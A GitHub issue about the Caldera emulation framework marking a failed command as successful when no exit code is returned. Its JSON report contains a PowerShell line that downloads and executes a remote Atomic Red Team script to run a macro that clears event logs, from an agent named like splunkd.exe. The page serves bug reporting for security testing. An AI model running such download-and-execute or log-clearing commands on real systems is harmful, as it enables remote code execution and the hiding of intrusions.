Operations report status incorrectly displayed #2798
Labels
Comments
|
Looks like your first issue -- we aim to respond to issues as quickly as possible. In the meantime, check out our documentation here: http://caldera.readthedocs.io/ |
|
Seems like this issue was caused due to an incomplete API call where I add an ability as a potential link to an operation. Unfortunately there is no default fallback for undefined parameters (e.g. tactic name, technique ID, etc). In my case this resulted in the lack of the atomic parser module. After assigning the value explicitly I got correct readings. For me, given you already require the ability_id it could use these values by default, just like it does if you use the GUI. Issue closed for me. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
I am experiencing issues with the way caldera is evaluating whether links/abilities have been successfully executed while no exit_code is available. In my case there is clearly an issue with the command execution yet it gets flagged with a status of 0 (success). Wouldn't it be more logical to add the exit code as a potential discriminator for successful command execution?
{
"ability_metadata": {
"ability_description": "Manual command ability",
"ability_id": "05f8b752dbccff102ef530103bd8e550",
"ability_name": "Clear Event Logs via VBA"
},
"agent_metadata": {
"architecture": "amd64",
"contact": "HTTP",
"created": "2023-07-10T12:51:54Z",
"group": "secops",
"host": "perp-clt-w101",
"location": "C:\Users\Public\splunkd.exe",
"paw": "ddntzl",
"pid": 7024,
"ppid": 5208,
"privilege": "User",
"username": "PERP\kkevin"
},
"agent_reported_time": "2023-07-28T10:08:54Z",
"attack_metadata": {
"tactic": "defense-evasion",
"technique_id": "T1070.001",
"technique_name": "auto-generated"
},
"collected_timestamp": "2023-07-28T12:08:55Z",
"command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing); Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"",
"delegated_timestamp": "2023-07-28T12:08:33Z",
"executor": "psh",
"finished_timestamp": "2023-07-28T12:08:59Z",
"operation_metadata": {
"operation_adversary": "ad-hoc",
"operation_name": "TUC00034",
"operation_start": "2023-07-28T12:08:33Z"
},
"output": {
"exit_code": "",
"stderr": "",
"stdout": "Get-Content : Cannot find path 'C:\Users\kkevin\Desktop\PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt' because it does not exist.At line:77 char:22+ $macroCode = Get-Content $macroFile -Raw+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (C:\Users\kkevin...1-macrocode.txt:String) [Get-Content], ItemNotFoundEx ception + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand Exception calling "Run" with "1" argument(s): "Can't run the specified macro"At line:91 char:5+ $app.Run($sub)+ ~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : COMException "
},
"pid": 1636,
"plaintext_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing); Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"",
"platform": "windows",
"status": 0
}
The text was updated successfully, but these errors were encountered: